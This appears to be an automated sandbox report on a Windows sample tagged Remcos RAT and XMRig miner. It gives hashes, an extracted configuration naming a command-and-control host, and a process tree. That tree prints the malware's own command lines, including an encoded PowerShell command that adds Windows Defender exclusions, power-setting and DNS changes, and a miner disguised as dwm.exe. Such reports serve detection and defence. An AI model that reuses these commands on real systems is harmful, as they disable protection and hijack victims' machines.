remcos | efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2022 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5051c71e2b1b319a14474b47876403e4.exe
Size

2.2MB
MD5

5051c71e2b1b319a14474b47876403e4
SHA1

3684e802d6831d76da44d53cef16939916976b94
SHA256

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1
SHA512

8aaaa2ed847f452972d36854925e6043fba389f8a8852aad02c10e67d6fc2b0baac5548b48762d522cac4d8980a98170097281fc175f06ff2387c5fdb13b3636
SSDEEP

24576:WN9ewmMdH+HY530osWnYQb6VOKs4zm2evT:I

Score

10^/10

remcos xmrig 220928 miner rat upx

Malware Config

Extracted

Family

remcos

Botnet

220928

minecraftrpgserver.com:80

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
software_reporter_tool.exe
copy_folder
Google
delete_file
true
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
adbkey.dat
keylog_flag
false
keylog_path
%Temp%
mouse_option
false
mutex
9416a517bdcd8521-8QM7X6
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Google
screenshot_path
%Temp%
screenshot_time
60
startup_value
Google
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

InstallUtil.exe

description	pid	process	target process
PID 5104 created 2736	5104	InstallUtil.exe	Explorer.EXE
PID 5104 created 2736	5104	InstallUtil.exe	Explorer.EXE
PID 5104 created 2736	5104	InstallUtil.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4864-203-0x00007FF6FCC00000-0x00007FF6FD3F4000-memory.dmp	xmrig
behavioral2/memory/4864-213-0x00007FF6FCC00000-0x00007FF6FD3F4000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

InstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe7z.exeInstallUtil.exe

pid process

4984 InstallUtil.exe
4704 unzip.exe
2104 unzip.exe
4072 unzip.exe
3632 unzip.exe
1384 7z.exe
5104 InstallUtil.exe

pid	process
4984	InstallUtil.exe
4704	unzip.exe
2104	unzip.exe
4072	unzip.exe
3632	unzip.exe
1384	7z.exe
5104	InstallUtil.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4864-203-0x00007FF6FCC00000-0x00007FF6FD3F4000-memory.dmp	upx
behavioral2/memory/4864-213-0x00007FF6FCC00000-0x00007FF6FD3F4000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

unzip.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	unzip.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

Processes:

7z.exe

pid process

1384 7z.exe

pid	process
1384	7z.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

5051c71e2b1b319a14474b47876403e4.exeInstallUtil.exe

description	pid	process	target process
PID 1320 set thread context of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 5104 set thread context of 4864	5104	InstallUtil.exe	dwm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3976 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2376 taskkill.exe
Modifies registry class 1 IoCs

Processes:

unzip.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings unzip.exe

pid	process
3976	schtasks.exe

pid	process
2376	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	unzip.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5051c71e2b1b319a14474b47876403e4.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exeInstallUtil.exedwm.exepowershell.exe

pid	process
1320	5051c71e2b1b319a14474b47876403e4.exe
1320	5051c71e2b1b319a14474b47876403e4.exe
4984	InstallUtil.exe
4984	InstallUtil.exe
2104	unzip.exe
2104	unzip.exe
4704	unzip.exe
4704	unzip.exe
4072	unzip.exe
4072	unzip.exe
3632	unzip.exe
3632	unzip.exe
4704	unzip.exe
2104	unzip.exe
4072	unzip.exe
3632	unzip.exe
5104	InstallUtil.exe
5104	InstallUtil.exe
5104	InstallUtil.exe
5104	InstallUtil.exe
5104	InstallUtil.exe
5104	InstallUtil.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

5051c71e2b1b319a14474b47876403e4.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe7z.exepowercfg.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exedwm.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1320	5051c71e2b1b319a14474b47876403e4.exe
Token: SeDebugPrivilege	4984	InstallUtil.exe
Token: SeDebugPrivilege	4704	unzip.exe
Token: SeDebugPrivilege	2104	unzip.exe
Token: SeDebugPrivilege	4072	unzip.exe
Token: SeDebugPrivilege	3632	unzip.exe
Token: SeRestorePrivilege	1384	7z.exe
Token: 35	1384	7z.exe
Token: SeSecurityPrivilege	1384	7z.exe
Token: SeSecurityPrivilege	1384	7z.exe
Token: SeShutdownPrivilege	668	powercfg.exe
Token: SeCreatePagefilePrivilege	668	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4248	WMIC.exe
Token: SeSecurityPrivilege	4248	WMIC.exe
Token: SeTakeOwnershipPrivilege	4248	WMIC.exe
Token: SeLoadDriverPrivilege	4248	WMIC.exe
Token: SeSystemProfilePrivilege	4248	WMIC.exe
Token: SeSystemtimePrivilege	4248	WMIC.exe
Token: SeProfSingleProcessPrivilege	4248	WMIC.exe
Token: SeIncBasePriorityPrivilege	4248	WMIC.exe
Token: SeCreatePagefilePrivilege	4248	WMIC.exe
Token: SeBackupPrivilege	4248	WMIC.exe
Token: SeRestorePrivilege	4248	WMIC.exe
Token: SeShutdownPrivilege	4248	WMIC.exe
Token: SeDebugPrivilege	4248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4248	WMIC.exe
Token: SeRemoteShutdownPrivilege	4248	WMIC.exe
Token: SeUndockPrivilege	4248	WMIC.exe
Token: SeManageVolumePrivilege	4248	WMIC.exe
Token: 33	4248	WMIC.exe
Token: 34	4248	WMIC.exe
Token: 35	4248	WMIC.exe
Token: 36	4248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4248	WMIC.exe
Token: SeSecurityPrivilege	4248	WMIC.exe
Token: SeTakeOwnershipPrivilege	4248	WMIC.exe
Token: SeLoadDriverPrivilege	4248	WMIC.exe
Token: SeSystemProfilePrivilege	4248	WMIC.exe
Token: SeSystemtimePrivilege	4248	WMIC.exe
Token: SeProfSingleProcessPrivilege	4248	WMIC.exe
Token: SeIncBasePriorityPrivilege	4248	WMIC.exe
Token: SeCreatePagefilePrivilege	4248	WMIC.exe
Token: SeBackupPrivilege	4248	WMIC.exe
Token: SeRestorePrivilege	4248	WMIC.exe
Token: SeShutdownPrivilege	4248	WMIC.exe
Token: SeDebugPrivilege	4248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4248	WMIC.exe
Token: SeRemoteShutdownPrivilege	4248	WMIC.exe
Token: SeUndockPrivilege	4248	WMIC.exe
Token: SeManageVolumePrivilege	4248	WMIC.exe
Token: 33	4248	WMIC.exe
Token: 34	4248	WMIC.exe
Token: 35	4248	WMIC.exe
Token: 36	4248	WMIC.exe
Token: SeShutdownPrivilege	800	powercfg.exe
Token: SeCreatePagefilePrivilege	800	powercfg.exe
Token: SeShutdownPrivilege	2456	powercfg.exe
Token: SeCreatePagefilePrivilege	2456	powercfg.exe
Token: SeShutdownPrivilege	4648	powercfg.exe
Token: SeCreatePagefilePrivilege	4648	powercfg.exe
Token: SeLockMemoryPrivilege	4864	dwm.exe
Token: SeLockMemoryPrivilege	4864	dwm.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	4364	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

dwm.exe

pid	process
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

dwm.exe

pid	process
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe
4864	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

InstallUtil.exe

pid process

4288 InstallUtil.exe

pid	process
4288	InstallUtil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5051c71e2b1b319a14474b47876403e4.exeInstallUtil.execmd.exeunzip.execmd.execmd.exeunzip.exeunzip.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 1320 wrote to memory of 4288	1320	5051c71e2b1b319a14474b47876403e4.exe	InstallUtil.exe
PID 4288 wrote to memory of 4984	4288	InstallUtil.exe	InstallUtil.exe
PID 4288 wrote to memory of 4984	4288	InstallUtil.exe	InstallUtil.exe
PID 4712 wrote to memory of 1992	4712	cmd.exe	choice.exe
PID 4712 wrote to memory of 1992	4712	cmd.exe	choice.exe
PID 4704 wrote to memory of 3688	4704	unzip.exe	cmd.exe
PID 4704 wrote to memory of 3688	4704	unzip.exe	cmd.exe
PID 4704 wrote to memory of 3688	4704	unzip.exe	cmd.exe
PID 3688 wrote to memory of 1972	3688	cmd.exe	netsh.exe
PID 3688 wrote to memory of 1972	3688	cmd.exe	netsh.exe
PID 3688 wrote to memory of 1972	3688	cmd.exe	netsh.exe
PID 4704 wrote to memory of 4400	4704	unzip.exe	cmd.exe
PID 4704 wrote to memory of 4400	4704	unzip.exe	cmd.exe
PID 4704 wrote to memory of 4400	4704	unzip.exe	cmd.exe
PID 4400 wrote to memory of 4064	4400	cmd.exe	netsh.exe
PID 4400 wrote to memory of 4064	4400	cmd.exe	netsh.exe
PID 4400 wrote to memory of 4064	4400	cmd.exe	netsh.exe
PID 4072 wrote to memory of 1064	4072	unzip.exe	cmd.exe
PID 4072 wrote to memory of 1064	4072	unzip.exe	cmd.exe
PID 4072 wrote to memory of 1064	4072	unzip.exe	cmd.exe
PID 3632 wrote to memory of 3864	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 3864	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 3864	3632	unzip.exe	cmd.exe
PID 3864 wrote to memory of 3976	3864	cmd.exe	schtasks.exe
PID 3864 wrote to memory of 3976	3864	cmd.exe	schtasks.exe
PID 3864 wrote to memory of 3976	3864	cmd.exe	schtasks.exe
PID 1064 wrote to memory of 1384	1064	cmd.exe	7z.exe
PID 1064 wrote to memory of 1384	1064	cmd.exe	7z.exe
PID 1064 wrote to memory of 1384	1064	cmd.exe	7z.exe
PID 3632 wrote to memory of 2176	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 2176	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 2176	3632	unzip.exe	cmd.exe
PID 4072 wrote to memory of 5104	4072	unzip.exe	InstallUtil.exe
PID 4072 wrote to memory of 5104	4072	unzip.exe	InstallUtil.exe
PID 4072 wrote to memory of 1132	4072	unzip.exe	cmd.exe
PID 4072 wrote to memory of 1132	4072	unzip.exe	cmd.exe
PID 4072 wrote to memory of 1132	4072	unzip.exe	cmd.exe
PID 1132 wrote to memory of 1212	1132	cmd.exe	choice.exe
PID 1132 wrote to memory of 1212	1132	cmd.exe	choice.exe
PID 1132 wrote to memory of 1212	1132	cmd.exe	choice.exe
PID 3632 wrote to memory of 2548	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 2548	3632	unzip.exe	cmd.exe
PID 3632 wrote to memory of 2548	3632	unzip.exe	cmd.exe
PID 1864 wrote to memory of 4248	1864	cmd.exe	WMIC.exe
PID 1864 wrote to memory of 4248	1864	cmd.exe	WMIC.exe
PID 4624 wrote to memory of 668	4624	cmd.exe	powercfg.exe
PID 4624 wrote to memory of 668	4624	cmd.exe	powercfg.exe
PID 2548 wrote to memory of 3536	2548	cmd.exe	attrib.exe
PID 2548 wrote to memory of 3536	2548	cmd.exe	attrib.exe
PID 2548 wrote to memory of 3536	2548	cmd.exe	attrib.exe
PID 4624 wrote to memory of 800	4624	cmd.exe	powercfg.exe
PID 4624 wrote to memory of 800	4624	cmd.exe	powercfg.exe
PID 4624 wrote to memory of 2456	4624	cmd.exe	powercfg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3536 attrib.exe

pid	process
3536	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe
"C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4288

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4624

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe ukzobzydbqshdvvh 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUOWlLosYbrY2pwtQQU1JTuikNmZuGmV+6BbKlyKFD6zdAaaNcQqky2iJHSWRIHnss9X/nab3QoNVM/Ta0kPMjvUxJH02YjP5XrdviLouahJX3Q1zD8omsKRft5FC/3aHRX5nzuLKj6v+l1hD7RDcnRlZOinraqnGRmc1rfZVBSryXdWQXUdRaex46bFg0DdbEVFMZ4l0pshLxALGam+crSqgmoA+SAgVTiLqPU5NWi5uz8p9/Px4ZVwH3rGiyQeauZd/VqfnXCdH0DEhBS0DRt+Weuu6gKyeQ5RrSfJ75TF5+fW2sqeJyzRaKmKd16nUvBvWK9P1hVtfbUjrx7WSXf4rvTPe5UgC3uEGkP5wCCVj4sAPVkBHTU9Jhx2DlvsdtFj/pjvCNlN4yCzDVXe/jPsmwoNwk9DDLAL1L+GE1DFO420v97Rx/FsdF4IRF7K8KMsSNKreyhr8kDg3eXzNVqg==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4864

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
2⤵
- Suspicious use of WriteProcessMemory
PID:3688

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
3⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
2⤵
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
3⤵
PID:4064

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8ASQBkAHMAIAAyADEANAA3ADgAMwAxADQAOQAzACAALQBUAGgAcgBlAGEAdABJAEQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgBfAEEAYwB0AGkAbwBuAHMAIABBAGwAbABvAHcAIAAtAEYAbwByAGMAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\ProgramData\Google\unzip.exe
